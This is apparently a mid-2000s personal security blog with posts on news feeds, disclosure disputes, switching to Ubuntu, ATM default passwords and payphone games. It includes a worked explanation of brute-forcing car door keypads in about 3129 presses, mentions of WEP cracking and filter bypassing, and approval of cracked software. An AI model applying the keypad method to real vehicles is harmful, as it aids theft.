I just started a Bloglines site yesterday and have begun populating it with news and blogs and vulnerability advisory sites. While I like the idea of a one-stop website I can go to for news, this still does tie me down to an Internet connection. I also have not been happy with the presentation of the feeds either. I like to have full content (unless fully overridden by the feed itself), I like to have posts parsed chronologically (not by site only), and I like to have them all displayed for at least a week back for blogs and less for others. With Bloglines, I've found I have to click a few times to get the Week view, and they never arrange in full chrono order. Hrmm...but I do like it for one-stop news while at work and at a hotspot. I can also maintain some anonymity there.

Maybe I should recheck RSSReader for some more view options. Other than at work, it really is a good option, as I really love the freedom to unplug somewhere like a park, and just browse news there.

The big downsides to RSS feeds? Easily, I dislike the oddball blogs or sites that have no RSS or non-compliant RSS. Some, I understand, are a functionality choice that was consciously made by the author, and that is fine. It is just hard on someone like me to remember that that site is an oddball. A newer downside, growing as RSS gains popularity, is the trust that apps, sites, and people put in parsed RSS feeds, which can carry malicious code.

Someday, I also need to find a good way (on Windows and preferably without iTunes) to automatically download podcasts and load them to a folder that I can sync with my iPod. Yeah, I know, I might still be behind the times, but iTunes originally was not something I trusted on my box, so I always stuck with winamp to manage my iPod. For now though, I'm content with my site of links to pod/vidcasts and downloading them manually.

Forums I truly love. I like the usually informal and discussion-like format of a forum. Maybe it just reminds me of IRC days, but forums have a special place in my heart. Sadly, a well-populated one with useful information is definitely not easy to find. My list of forums is woefully small, and half of even those are filtered at work.

My last major source of information has been mailing lists. I started out getting on a number of busy mailing lists a few years ago with a gmail account, but found the web mail interface and my own lack of time very disappointing and as such I stopped reading them. I have only recently renewed my reading by pulling that gmail data down to Thunderbird and abusing filters to sort out the mailing lists. This has worked pretty well for me, but I still have yet to really work mailing list reading into my daily or weekly routine. I need to read them for a while, cull the useless ones, and settle down there. Having mailing lists post directly to a forum or blog (with thread REs being placed into comments) would be awesome, even if just for my own private viewing.

Anyway, these are just some ways I'm attempting to usher myself through this sponge phase of my career, and I can already feel it coming to a climax and settling down for me, which is very good.

.: security pet peeve #4: the obvious need

There are a number of news publications and sites and posts that say things like, "organizations now need encrypted backups," or "spam is out of control," or "building a comprehensive disaster recovery plan."

I get a little happy when I see something like that, and I read into the article only to realize it is just one of those "obvious need" articles. These articles are great for new topics, but far too often they cover already-old news and offer me nothing on how to actually perform these functions. Too often, I get the feeling these are written by people who can complain about the problem, but really have no idea how to fix it, nor have had any experience in what the challenges may be in encrypting all backups or trying to implement a company's first disaster recovery initiative.

.: maynor&cache vs apple: the winner...full disclosure

So for the past month the IT world has been abuzz about how David Maynor and Johnny Cache demonstrated undisclosed attacks to root wireless laptops where they may or may not have used Apple's built-in wireless card or third-party wireless drivers for a possible third-party wireless card.

And look at where Maynor and Cache are now. In the middle of this summer's biggest IT feud, which is spreading a feeling amongst the "blogosphere" that is worse than a smarmy, humid, hot, and never-ending day in the mosquito-infested bayou. Ugh.

All of this uncertainty has resulted in mudslinging, amateur journalists (bloggers) having panic attacks, Mac fans up in knee-jerk reactionary arms, large corporations side-stepping issues, and quite a lot of upset and pissed off people all yelling at each other and only half-reading everyone else's posts before adding to the panic. And the only way to clear all of this up is for Maynor/Cache to admit they faked the whole thing (I don't think so), for Apple to admit they have been skirting the issue and finally take responsibility for it (I don't think so), or for the details to finally be released (after a fix, of course).

Until such time, we're all still left with uncertainty. But what I am certain about is our approach to "responsible disclosure" is going to be coming to a head, and I don't think corporations will be happy with the imminent conclusion.

Security practitioners are paranoid people. They tend to not trust much, let alone large corporations. Hackers and the underground are far less inclined to trust corporations. This distrust promotes the use of full disclosure, whether or not you notify the corporations beforehand, although I suspect a majority of people will notify the target companies prior to full detail release.

Wireless issues aside, there was no real way for these two to publish their findings without incurring wrath from someone. I think they took the lesser of three evils, while they at least got their names out there and known in the industry.

Last year was Michael Lynn vs Cisco where Lynn finally came clean (or attempted to) with a big Cisco vulnerability which Cisco did not fix in a "proper" amount of time. This year we have Maynor and Cache with wireless driver attacks.

In the end, every security researcher is going to think three times about releasing code. I think this will lead to one extreme or another. Either vulnerabilities will be released to the highest bidder or to the parent corporation and not released until a fix is released. Or exploits will be publicly released right away, giving the information to everyone at the same time. Considering security/hacking circles that are paranoid, a little untrusting of corporations, and very passionate about security/insecurity, I see the latter being the more likely.

.: defcon12 running man contest
Just thought this an awesome little idea for a contest. Defcon is definitely one of the most unusual and interesting security "conventions" around, as hackers and gov't security folks play contests that basically hone and demonstrate and teach security and anti-security skills. Quite amazing. In this contest..well..click to the article.
.: linux

I am really toying with the idea of plunging fully into Linux...while also just testing with my toes again. Hrmm...

I've run Linux in the past, from Red Hat version 7 up to SuSE 9.x and various Livecd incarnations. But I've never been able to stick with an install for long enough to really immerse myself into it. Red Hat 7 was interrupted due to a need to do some resume/website work back after college when I was unemployed. SuSE was interrupted by my need for gaming...multiple times.

But the gap between Linux and Windows, especially the apps in Windows that I rely on a day-to-day or weekly basis, is greatly diminished now, if not gone altogether. The only real gaps would be ease of use of all the years of acquiring apps and programs to do certain tasks, the support for gaming, and the support for wireless.

The years of acquiring apps may be interrupted soon by Windows itself...who knows what Vista will be changing when it finally releases, but it will be a whole new world to learn anyway (although not entirely). The support for gaming has been getting better, but only slowly. Thankfully, having a gaming-only machine is not a bad idea, especially since any Linux that I run will not need beefy specs or expensive machines. And support for wireless has been getting better in leaps and bounds, to the point that some of my Livecds recognize my wireless laptop right from the install, and get online with absolutely no work on my part.

But, I do still game, and I do still have a lot of things on my XP laptop that I just can't part with quite yet, especially since it's the only machine that seems to accept any of my old Windows XP keys and licenses (damn Genuine Advantage, in the end, it will end up driving me away from Windows...).

So, one thing I really want to do is make sure I have Linux on a laptop, which does greatly limit my choices on my systems. I think I might give another shot to dual-booting or even just running VMWare Workstation on my laptop and carving out some space for a Linux install. I know my system isn't all that robust (512MB RAM), but I think if I go ahead and wipe it off and reinstall Windows XP, it should be cleaned up enough to allow me to run a VM Linux (Ubuntu or SuSE again).

This post started out with me wondering to myself where I should put Linux and work it into my daily life, up to listing my systems and the pros and cons...but I think I already just talked myself through my plan.

This will leave me my gaming system, a possibility for less intensive games on my laptop, and leave me other lesser-speed Windows 2000 laptops for other uses. My other desktop-class systems can then still be whatever, as they are just used in my lab.

First order of business though: clean off the XP laptop, back everything up that I need or want, take inventory of what I need to replace, and start to organize up my tools and tempfolder (a dropbox for all sorts of incoming things that I've not played with, tried out, or used enough to file them away to keep or delete).

.: free is not always free even in cyberspace

An article posted on SecurityFocus quoted:

Building on a Wall Street Journal analysis of the 20 million search queries leaked by America Online that found "free" to be the most popular search term, SiteAdvisor warned that the results produced by such searches frequently lead to malicious Web sites.

"Often, so-called 'free' items are anything but free," the company, recently bought by security firm McAfee, stated in its advisory. "Free screensaver and games sites are notorious for bundling spyware and adware with downloads... Free e-card sites often share users' e-mail addresses with third parties and can lead to a never-ending influx of spam... Ringtone sites frequently lure consumers with misleading offers of free tones that ultimately lead to automatic enrollment in paid subscriptions."

I admit, back in the day free stuff used to be cool to download. These days, however, they are packed with spyware and other not-so-nice things. Always have to wonder, "why is this free, what are they hoping to get?" More often than not, to get something installed on your computer or get your "clicks" on their sites.

I honestly have more trust in downloading cracked commercial apps through my regular channels as opposed to free sites. However, when looking for legit free things, I put a lot of faith in SourceForge-hosted apps and anything from a website that looks like a real developer just offering out to the world some little tool he/she created to do something cool. Anything else like free screensavers and the like are just not really worth the time and effort and risk.

.: social engineering

This is social engineering at its best, and scariest. Just think if this guy had more important things to say, or was passing himself off as speaking on behalf of someone or something more important. Wow.

.: six worst security mistakes

NetworkWorld posted a rather good series of articles on the six worst security mistakes.

1. Not having a security architecture- I like this overview, but I would add the need for logging and reviews of logging, from syslog/snmp stuff to web logs, OS logs, etc. Sadly, none of the companies I have worked for have been big enough to trouble themselves with spending money on formal security architectures beyond what is done when the environments are built or enhanced. Policy and protections have been second place, at best, to functionality and getting the needs taken care of.

2. Not investing in training- This discussion was awesome and a lot of poignant stuff was mentioned. I liked the contrast of the benefit of employee training and what happens when untrained people make decisions.

3. Neglecting identity management- Since I've not worked in environments with over 500 employees, I've not had to worry much about identity management. Sadly, gaining any type of knowledge here is difficult, as so many sources pretty much say, "you need identity management, here's kinda what it is" but never discuss what products work, what don't, pros and cons of each, or even how to properly implement it from user acceptance to technical specs. This is one of my biggest issues with a lot of trade mags, especially vendor/ad supported mags that otherwise get sent free. They talk in general terms without actually giving me, an IT doer, much substance. Someday I'd like to examine identity management systems, but so far I've not seen a need for it in current environments. If I could make my own home-brew setup with little cost (maybe a USB fob and open source software), I would love to add that to my projects list.

4. Ignoring the insider threat- Most articles talk about how the insider threat needs attention, but never explain what to do, even in the most elementary terms. This piece goes one step further than most by saying one should monitor employee network use, harden the internal network, use internal network IPS to filter at the switch level, review and test internal access controls, and limit explicit trust in pretty much everyone. This is a good start, but spending money on this can be difficult as not many people really want to think about insider attacks. HR and management like to trust their employees while IT security tends to distrust pretty much everyone. This is just a matter of having different viewpoints, and can be a hard topic to effectively discuss. I think I would add that not just employee use should be monitored, but all internal system logs as well, especially for odd connections, failed authentications, IPS/IDS alerts, and mysterious local account creation. Internal routers and firewalls can help segment things quite nicely and put off the bear of hardening all systems, at least for a while.

5. Not protecting web appliances- This was a shaky article, but I like the identification of three levels to protect when it comes to web servers: the host (OS), the server infrastructure (IIS/Apache I believe he meant), and the web application. The host and the infrastructure are no-brainers, really. The web app is the dicey part. In my experience, infrastructure (network and sysadmin roles) is not married with application development; in fact, these teams tend to work in opposition to each other. Likewise, security tends to fall in the middle somewhere. Infrastructure may bring it up and even test it, but typically we are hands-off when it actually comes to code changes. Whenever talking about web site security strategies from an infrastructure viewpoint, defense in depth must always be used. Assume there will be vulnerabilities in the web app, and plan to mitigate them. If development and infrastructure work well together, it will be a cold day in hell... :(

6. Buying products with the most bells and whistles- This is an interesting item, and I think is a product of poor training, lack of time to make accurate assessments and decisions in the face of sales propaganda, and lack of having a security architecture or plan. Sadly, I often hear about how appliances are purchased and forced into an environment because some senior manager read about it in a magazine and demanded it, all without truly evaluating the needs, the best solutions, or determining if there is a need for more staff to properly manage it. A spiffy buzzword logging device is useless if no one is looking at the log reports or investigating the reported issues.

.: illustrated guide to cryptographic hashes
This looks like a fun and well-written read, an illustrated guide to cryptographic hashes.
.: bypassing web filters, firewalls, proxies
Sometimes these things are very useful, and sometimes admins should block access to them. The Your-Freedom site offers such a service to bypass content filters, firewalls, and proxies.
.: wifi hog
The wifi hog project. Not sure what to make of this, but gotta read it someday.
.: insider threat study
This study on insider threats in IT is a bit dated, but let's be honest. People don't get outdated. This study is amazingly detailed and very important even today, 10+ years later.

Here is some more interesting spy information and insider threat character analysis.

And here is a guide to insider threat risk assessment.
.: security and hacking videos
I finally tracked down this link to a HUGE collection of videos (mp4 format) available through BitTorrent of presentations at the 22nd Chaos Communication Congress (22C3) in Europe. Will need a Torrent client like Azureus. I have already started downloading this and am not even 1/4th through the list and it is already taking up 12GB of space. Will also need QuickTime or an alternative to QuickTime (recommended).

Updated link: videos. Be creative with the URL and you can find past years. When in doubt, hit the root site.
.: stream of discovery?

Stream of consciousness amazes me. In addition, the stream by which we discover new experiences is fun too. Take for instance this quick journey.

I like hacking and computers and security. Recently, I found a bunch of movies from the 22nd Chaos Computer Congress lectures from late last year. One lecture was "The Realtime Podcast." The lecturer basically ran an actual podcast on stage, but the podcast consisted of him lecturing on how to do podcasting, the tools, styles, marketing, etc. His background music was really cool. Thankfully he acknowledged it as DJ L'embrouille. The music is just these really chilled-out electronic/ambient mixes. Amazingly, he releases these to the public and they can be downloaded. So now I have been listening to about 10GB of his mixes and loving every minute of it. This is awesome stuff to just have playing in the background while doing some computer work.

Now, if this guy had not released this stuff freely, would I have ever heard of him? Doubt it. Would I pay to see him in person? Yup...and that would be money in his pocket due to free Internet distribution. Wake up RIAA.

.: simplicity sells

I've read this in a few places recently, particularly in regard to security software and appliances, but this video of one of the TED talks by David Pogue ties that in with my own feelings of the backlash on computers and electronics and how things are just too damned complicated. Too many buttons, too many clicks, too many features I will never use. Some people stomach it; others abandon the tech. I know too many people who are abandoning computers and the Internet because of all the complications.

Well, simplicity sells, and the above-linked talk was very well-done. Take out features, don't cram them in. The company 37signals does this as well, and has been remarkably successful, as have other post-dotcom small software companies, and even large companies like Apple with the ipod. This world needs simplicity and to get back to basics as opposed to bolting on features. Google, while maybe not as simplistic anymore overall, still has the best, most-trusted, and simple web search. Do that one thing and do it well.

I look forward to security software and appliances taking note of this trend and offering just the one or two things instead of trying to package every security measure into one device or app. I think this is short-sighted and just a way to increase their market and market share. Instead of doing things well, overwhelm others by just out-featuring them to get into as many markets at once as possible.

Linux and Unix have done this well for years, decades. Simple programs with few bells and whistles that do their designed task and no more. To do more, you combine them with other equally streamlined tools. cat firewall.log | grep denied. That's the true beauty in *nix, the command line power and simplicity. Granted, this is a geek's take on it... :) At least in the *nix world, the techs like me can still milk our creative sides in using these tools together in complex and beautiful ways as opposed to being handed a huge soundboard with 209208 dials and switches to do god-knows-what and produce 45x more reports than I'll ever use.

.: cracking wep on a mac
I have posts on how to crack wep on most any other flavor, now to add Mac too!
.: pix capture
If I can get my hands on a pix for educational purposes, I can play around with the capture command.
.: linux as my main box - part 1

I have used Linux here and there in the past 5 years, but in the past 2 years, my experience has been drastically limited to livecds (which, in their own right, are really awesome anyway!). I've long wanted to get away from Windows since I know 95% of what I'll ever know about Windows XP and previous anyway, and I really want to use a Mac or Linux box as my main OS at home for various reasons.

I've never made the jump and kept putting it off due to this reason or that, most notably two major reasons: I wanted to play WoW, which is difficult for anyone on Linux, and I wanted easy wireless access that wasn't a bitch to configure, support, or install. Wireless support has gotten better in the past few years, and my laptop really is not nearly as fun to play WoW on as my resurrected gaming rig. So...all the big barrier reasons are gone!

This weekend I went out and bought a new laptop drive, 100GB. My plan was to dual boot Windows and Ubuntu Linux and also have some room to run a VM in Ubuntu and VM another Windows install or two plus others. The reason to dual-boot is so that I can get true wireless on both OS, since any VM is going to think it is on a wired connection. More on this later...

So I swapped my drive and put in Ubuntu 6.06 desktop. I did an install, it performed a format on my drive and was done. I literally blinked a few times and figured something screwed up or the instructions were incomplete. I rebooted Ubuntu from the livecd, saw that I had missed nothing, and on a whim decided to reboot without a cd. Sure enough, Ubuntu started up just fine and had been installed on the HD just like that. Wham! That's the shortest install of an OS I've ever had!

The sad thing, though, is the Ubuntu partition support. It is basically an all-or-none approach and I didn't get much help or options in doing manual partitioning. Unfortunately, the automatic part made me use all 100GB of the disk for ext3. Hrmm..well, I guess I can live with that for now and just swap hard drives when I want to go Windows. I may have to add in a mini-project to see if I can get an external enclosure and boot from it, but that's another project.

So, Ubuntu was working. In fact, both my wired and wireless network cards were recognized immediately. I hooked into my wired network, got an IP address, connected to my wireless AP to get my WEP key (yes I use WEP because I practice breaking my own network with various tools...long story), and configured up my wireless. Big props to Ubuntu, as it took on the first try and I had wireless on Linux with zero blood and sweat. Wow!

Now, I'm swapping back and forth between my hard drives and Windows and Linux as I move all my tasks and things I do on Windows over to Linux one by one. Hopefully in the next week or two, I will be running Ubuntu 95% of the time my laptop is powered on. The only snag may be if I figure out how to most properly carve up my disk so that I can still dual-boot Ubuntu and Windows XP. This might mean installing XP first and using it to format the disk, then seeing if Ubuntu will limit itself to whatever space is still open. I'd like to just do about 35GB for Ubuntu (ext3), 15GB for Windows XP (NTFS), and the rest for either shared space (FAT) or VMs.

Next steps: Opening up Synaptic to allow me to install packages from the universe and multiverse, finding the root password (yeah, go figure, I couldn't find it and it never asked me for one on the install?) so I can su up, and getting some common apps installed that I use on a daily basis, such as Thunderbird, gaim (or a Linux equivalent to gaim), and mp3 player. Now that I think about it, my ipod support may be all borked up now. I use winamp+ml-ipod to manage my ipod and music as opposed to iTunes, but thankfully that is a minor gripe. I'll live. :)

.: atm crime spree? more about default passwords

A recent theft from an ATM machine in broad daylight using a key sequence which unlocked the machine and allowed the criminal to reprogram it to dispense larger bills than it thought it was doing, has had plenty of follow-up.

While this issue may bring the idea to the minds of young people in some small groups of the nation, I doubt this will turn into some sort of crime spree. However, it does illustrate exactly the failings of computer networks decades ago, and something that continues today in many electronics areas outside computer networks: default passwords. When a technician or operator installs electronic equipment like ATMs, it is very unclear whether they properly change default passwords or close any backdoors. Telephone boxes, ATMs, lighted road construction signs, and many more devices are frequently left with default passwords. The only protection is usually threefold: 1) a lock on the internal workings of the device, 2) obscurity by not publicizing the passwords and backdoors and manuals widely, 3) common human conscience to not do something criminal in public.

The hacking/phreaking community has known about these things for decades. ATM boxes are a very popular target and many of these issues have been long known. A lock can be picked, broken, or just plain left unsecured. Obscurity is not a protection when used alone, and hiding passwords and manuals, and basically not teaching non-qualified people how to use devices, is not protection. Frequently, this is defeated by operators leaving the manual nearby or scrawling notes with passwords inside the box. Obviously, the conscience of the person is widely variable and some people will not be deterred by it.

It is only a matter of time before more things like this are discovered out and about in less technical areas of the world. These devices lie in a gray, forgotten area between the point when electronics started getting smarter (and thus needed passwords for operations) and the widespread security paranoia around computer systems, whose attacks are widely publicized via a very efficient Internet medium. Also, many of these systems sit in an area between white collar workers and IT staff; a lost area that is as much ignored as actually forgotten.

.: putting it to bed and dying?

To put this topic to bed in my mind, here is Apple's notice about wireless security updates. This hopefully will also put to bed other people who criticized and had panic attacks and panicked fanboy defenses when Maynor and Cache presented about wireless driver exploits and did so on a Mac. I love Macs as much as the next person, but please, don't cannibalize our own people. We need to encourage research, not hang it out to be stoned when it discovers something important against our favorite hardware/software or isn't fully disclosed like our mischievous hearts want. This whole situation elicited passionate, emotional responses from many people (we should have seen that coming, with the Mac vs Windows vs Linux debates), including people who should be more dispassionate due to our profession. That includes journalists and bloggers who completely misrepresented and had no comprehension of even a visual, video presentation and what the implications were. Unethical journalism (brought about in large part by the clashing and greying between proper journalism and amateur bloggers) really did not help.

[ Update: Two more links just for me. First, Matasano's commentary on the new patch, and a link from a commenter about third party accreditation when you can't trust the researchers, the press, or the company. Excellent idea!! ]

At any rate, hopefully this is back to bed, and props to Maynor and Cache for putting their necks in the noose, whether for fame or public utility (I don't much care), at least this improves our awareness about wireless issues and improves the software and drivers that power it. Ignorance is not a security blanket.

Totally unrelated: Is Amazon.com dying? Their pages the past two days load like molasses, if at all. I wonder if they are weathering some attack or what?

.: linux as main box - part 2: the score

I've used Linux in the past, Red Hat, SuSE, Slackware, Knoppix, and various other livecds, but have never been able to make it a regular box that I use 95% of the time. Hopefully this will change.

But first, I want to just out and say it: Linux is not ready for prime time. Not even Ubuntu. Unfortunately, Windows is far easier to wield and get things done on. It might be less secure, but this is the classic usability vs security relationship. Thankfully, Ubuntu is not just for the uber-geek elite anymore, and can be adopted by hardcore geeks and even casual geeks, but it is not ready for the average consumer or user, and has a long way to go.

What better way to compare the two than by keeping score. Now, keep in mind Ubuntu is going to win in the end, as Linux will for me. I plan to stick with it and hammer away at it until I'm firmly on the "other side." It might be painful, but this is just part of learning and becoming a better geek (read: IT professional).

The install, as stated before, was amazingly fast compared to any other OS I've run. I literally thought I was still running the livecd portion of Ubuntu when I first rebooted (Ubuntu +1). However, the partition options leave a lot to be desired. While Windows is simple with partitions, Linux has always been arcane with them and knowing how many you need and how to carve them up is, in my opinion, the single biggest detractor for new users to try out Linux. Right from the start, it is complicated and difficult and unknown. Many people put it down right there without really giving it a true try. Ubuntu is an all or "know it yourself" install. Either it takes the whole disc or pre-made partition, or you have to know what you're doing. Sadly, I don't, and many people won't either (Windows +1).

So, last night I went about making sure I could do the typical things I want to do. I first updated Ubuntu, which, like Windows, prompted me with a nag screen saying there were updates. Nice! The updates were relatively quick for having 170+ updates, and of course required no reboot (Ubuntu +1).

Synaptic is really cool, and I'm happy with it. One bad point though, is that you're stuck with Ubuntu's packages and you need a little bit more knowledge to open up the universe and multiverse to more downloads. But, I always have liked having a central repository for many programs, all of which are free (Ubuntu +2, Windows +1 [how many people really catch the universe/multiverse updates without work?]). My biggest complaint about Synaptic, though, is how easy it is to do something and say, "omg, wtf did I just do?" I did this by selecting some packages and not paying close attention to the required packages or things that needed removal. After walking away to pop in a movie, I came back and hit "Apply," only to see Ubuntu quickly remove some things. I have no idea what they were, but I hope they were not important. I have learned, however, that I really should do one thing at a time, and scribble down what is added and removed, at least until I'm comfortable with this process.

sudo gedit /etc/apt/sources.list

add in:

deb http://us.archive.ubuntu.com/ubuntu/ dapper universe
deb-src http://us.archive.ubuntu.com/ubuntu/ dapper universe
deb http://us.archive.ubuntu.com/ubuntu/ dapper multiverse
deb-src http://us.archive.ubuntu.com/ubuntu/ dapper multiverse

save, then:

sudo apt-get update
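The "omg, wtf did I just do?" moment above has a cheap answer: dpkg records every install, upgrade and removal with a timestamp, so what Synaptic took away can be recovered after the fact. The script below is an added example, not part of the original post; it parses constructed sample lines in the dpkg.log format (the real file is /var/log/dpkg.log) and reports the actions taken since a given time.

```shell
#!/bin/sh
# Added example (not from the original post): recover what a package run added or
# removed by reading dpkg's log. The real log is /var/log/dpkg.log; the lines below
# are CONSTRUCTED sample data in the same format:
#   DATE TIME install|upgrade|remove|purge PACKAGE OLD-VERSION NEW-VERSION
#   DATE TIME status STATE PACKAGE VERSION          (state changes, not actions)
SAMPLE_DPKG_LOG='2006-08-01 21:10:02 startup packages remove
2006-08-01 21:10:03 status half-configured libexample1 1.0-1
2006-08-01 21:10:03 remove libexample1 1.0-1 <none>
2006-08-01 21:10:04 status not-installed libexample1 <none>
2006-08-01 21:10:10 startup packages configure
2006-08-01 21:10:11 install kismet <none> 2006.04.R1-1
2006-08-01 21:10:15 upgrade tcpdump 3.9.4-1 3.9.4-2
2006-08-01 21:10:20 remove totem 1.4.1-1ubuntu1 <none>
2006-08-01 22:30:00 install lxdoom <none> 1.4.4-8'

# dpkg_actions LOGTEXT ACTION [SINCE]
# Prints "package old-version new-version" for every line whose action is ACTION
# (install, upgrade, remove, purge) at or after the optional SINCE timestamp,
# given as "YYYY-MM-DD HH:MM:SS". Timestamps sort correctly as plain strings.
dpkg_actions() {
    printf '%s\n' "$1" | awk -v want="$2" -v since="${3:-0000-00-00 00:00:00}" '
        # $1 date, $2 time, $3 action, $4 package, $5 old version, $6 new version.
        # "status" and "startup" lines describe state, not an action, so they are skipped.
        $3 == want && ($1 " " $2) >= since { print $4, $5, $6 }
    '
}

# removed_names LOGTEXT [SINCE]: only the names of packages that were removed,
# one per line, which is the list worth "scribbling down" after an Apply.
removed_names() {
    dpkg_actions "$1" remove "${2:-}" | awk '{ print $1 }'
}

# Stand-alone usage: show what the sample run removed. To see this BEFORE hitting
# Apply, run the same change from a terminal as a simulation: apt-get -s install PKG
echo "Removed in sample log:"
removed_names "$SAMPLE_DPKG_LOG"
```

On a real system, replace the sample text with "$(cat /var/log/dpkg.log)" and pass the time you started Synaptic as SINCE.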

And this is the second biggest issue people have with Linux, and myself: the installs. Windows has a huge boost here with automatic installers that take care of everything. You don't need to unzip things usually (and if you do, it's easy). You don't need to compile from source code. You don't need to hunt for packages that work with your OS flavor (Windows flavors don't run concurrently, there's really only one active one at any time now, not counting Server). You don't need to wonder what the executable is or how to run it, it appears automatically in your Start->Programs list. Ubuntu is not so helpful all the time. I installed about 10 different packages from kismet and airsnort to lxdoom and tcpdump. Over half the installed packages were installed, and then promptly hidden from me. They were not in the Application list nor did I find them in the filesystem. Granted, most of the ones now found seem to be command-line apps, but this is a huge hole for most casual users. "I installed lxdoom to play it, now it doesn't appear, what gives?" (Windows +1) Not only that, but at least Synaptic takes care of linked packages or things you need before something you want. Trying to track these down and align the planets just to install one program can be a huge headache in Linux. (Windows +1)

So, an OS that is going to be a "Windows killer" better do some basic things without fuss. Ubuntu's wireless works, Firefox is installed by default, Thunderbird is installed by default, but is not the default mail program and does require being added into the Application list (Windows Start->Programs list). I installed GAIM without problem and promptly got on my IMs without issue at all. (Ubuntu +1 Windows +1)

I then popped in a DVD. Totem, the default media player, threw an arcane error. Ok, I didn't want Totem anyway. So I installed mplayer. It also threw an error, even more arcane than the first. I then installed Ogle and Xine, both of which also could not read my DVDs. Wow. I did some research and it turns out encrypted DVDs are just enough of a closed format that Ubuntu decided not to include the ability to play them out of the box, or even after installing new players. In fact, I couldn't find the libraries I needed in Synaptic. D'oh. I found libdvdread3 just fine, but libdvdcss2 had to be downloaded from some guy's FTP in Sweden. (Windows +1)

use synaptic to get libdvdread3

install libdvdcss2:

sudo /usr/share/doc/libdvdread3/examples/install-css.sh

Whoa, wait a minute here...what version did I just download? What command did I have to run to make it work? I have to download some weird library that may or may not be 2 years old from some guy's FTP site in Sweden? I did more searches and found more German and other foreign sites, none of which looked commercial. This is the kind of thing in Windows that we, as security people, work to avoid: downloading from sites that make us stop and get paranoid about. (Windows +1)

After putting in the new library, though, all the players could play my DVDs without problem (I think I like the Xine interface best, but it doesn't fill my whole screen, sadly...which may be a graphics driver issue, but with the player...). However, this sort of hassle and *need* to Google up and understand uber-geek Linuxspeak to get it to work is going to keep Ubuntu from being used by my parents and friends. (Windows +1)

So that is where I stand right now. I can do most of the things I want to do on a daily basis (email, web, IM, and accessing my external drives for media like music, and dvd playing [with effort]), but where Ubuntu makes up ground on Windows in the install and ease of deployment, it loses ground in the places Linux has always lost ground: packages, not doing the necessary things out of the box, and needing to put on the geek cap just to work around things. Does Windows necessarily do this better? Perhaps not, but at least 99% of the computer-using world is used to it.

The score appears to be about how I expect, with Windows leading at this point, because this is all the hard, preventative stuff from Linux and Ubuntu so far. Windows 8 Ubuntu 5.

.: the career it writers

I diss on the blogosphere a lot for being bad reporters of news, but great reporters of experience and opinion (which in a way is news as well). I guess the difference is journalists have a level of ethics to maintain whereas bloggers can basically do whatever the heck they want.

Anyway, one question I've had in my head lately is about the career writers. There are bloggers and journalists in IT that I sometimes see or read, and I frequently look at their bios or background, just to see where they are coming from. Often, I see they have 15-20 years of writing about IT and journalism and papers and 15+ books written or contributed to.

I don't get this sometimes. Are they career writers? Do they actually do any IT stuff either in an enterprise or at least at the consumer level? Or do they just play at home, talk to others more knowledgeable, and just write about it? Those people kinda bug me...

.: security outside the box: car keypads

This is just a little bit old, but there are still plenty of cars that sport the numbered keypads to unlock the driver's side door. There are really only 5 keys here, and thinking outside the box, one can quickly test that this is just a password entry, but there is no end bit or anything. It just sits and listens and waits for the proper combination no matter what preceded it or followed it. Turns out, it only takes 3129 keypresses max to get the door to open. The article states this takes about 20 minutes. Just imagine reciting the cheat sheet into a recorder like an ipod and then just listening to the sequence as you key it in.
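Why the number is that small, as an added note rather than something from the article: assume codes are 5 digits long (the post does not say so, but 3129 only works out that way) and the keypad checks every window of the last 5 presses with no terminator and no lockout. Then

$$N_{\text{codes}} = 5^5 = 3125, \qquad L_{\min} = 5^5 + (5 - 1) = 3129$$

because a de Bruijn sequence $B(5,5)$ contains every 5-digit string exactly once as a contiguous window, so after the first four presses each additional press tests one new code. Any design that breaks the sliding window, such as requiring an enter key, a pause between attempts, or a lockout after a few failures, makes each guess cost a full code entry (or a wait), and the shortcut disappears.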

The more I think about it, the more it makes sense that this whole idea didn't last very long and not all that many cars used it or still use it.

.: payphone warriors

Now this is a really fun-sounding idea for a metro game: players attempt to control as many payphones in an area as possible by calling from the phone to a central scorekeeper. The link gives plenty of information. This isn't necessarily something to be done in say, my state of Iowa, but would be amazingly fun in a very payphone-heavy metro area. What would be most interesting, though, is seeing how it is set up and run. Checking out the Asterisk setup behind the scenes, as well as how the payphone signatures are determined. I wonder if a game like this can be devised for DefCon? I wonder if payphone signatures can be spoofed such that a player can just adjust the variable and keep calling back from one phone?

Now what about expanding this to, say, the entire city of New York in a never-ending game where you can call up at any time? What about doing this for wireless hotspots or networks? Granted, you can spoof your IP and stuff, but what about needing to maintain a solid session with a central server from a wireless network, and submit data about that network? And note that I'm not saying open, public wireless networks... This whole idea is similar to a capture the flag competition, only mixing physical movement along with traversing the digital landscape. All the more reason to move to a more urban location. ;-)

.: passing the torch again

I started reading this article about Windows XP just to fill time, but by the time I got to the second page, I was noticing some subtle and poignant things being said.

The initial simplicity [of Windows XP] almost never survives contact with software installers. Most of them ignore Microsoft's programming guidelines by dumping shortcuts and icons across the Start Menu, the desktop and the "tray," that parking lot of tiny icons at the bottom-right corner. Good luck finding anything on the screen after you've let the likes of AOL Instant Messenger or RealPlayer have their way with XP.

With all that extra software, Microsoft needs to persuade other companies to play by its rules, but it's had trouble getting even its own programmers to do that. The mere presence of Windows Vista can't change this failure to communicate.

From device drivers to installed software, it all basically does whatever it wants to do, due to Microsoft's approach to system architecture. I am fully convinced that Windows is a product of consumer usability, and not of any intelligent security design or means to be solid and stable and loved for decades. Now, whether that is good or bad is another story, as Microsoft has grown rich and huge for those choices.

The operating system has done little to ensure that programs move in and move out in an orderly manner; they can throw supporting files and data all over the hard drive, then leave the junk behind when software is uninstalled. As a result, something that should have been fixed in Win 95 -- the way Windows slowly chokes on the leftovers of old programs -- remains a problem.

This is all too true, but again, what alternative is there? And with moving forward in Vista, how exactly will that fix everything? So many programs are bound to act funky or outright break with the new OS. People who have paid for these programs will clamor for support with upgrades (which thankfully software vendors have gotten consumers used to purchasing these upgrades). But, in the end, turning this huge ship that is a Windows-based community around is not going to be easy, or maybe even possible with the Windows OS architecture.

Imagine having Windows running so many important things for years, or even 20 years from now. The world is also becoming more PC-literate, but you can bet that 99% of all the next generation users are growing up with Windows, as opposed to other OS flavors, although I will give that next-gens will be better able to adapt to other OS options if they so choose to. This means that there is a very real threat to *nix servers and tools that they will slowly be bred out of existence (of note, putting *nix into the hands of developing countries can then be both a saving grace or also further stratification...).

Hopefully Windows gets some things right with Vista, but somehow I really doubt it. XP was a major step for Microsoft and it has lasted 5 years during the stabilization of the PC in our daily lives, young and old. I think it will look prettier, be larger, be more complex, will have more layers and layers of cool graphics and security apps, but it all just covers the same buggy and outdated architecture underneath.

At least it still means job security. :)

.: security checker tools for web apps
Holy crap, this paper on security checker tools for web apps is huge!
.: bypassing nac
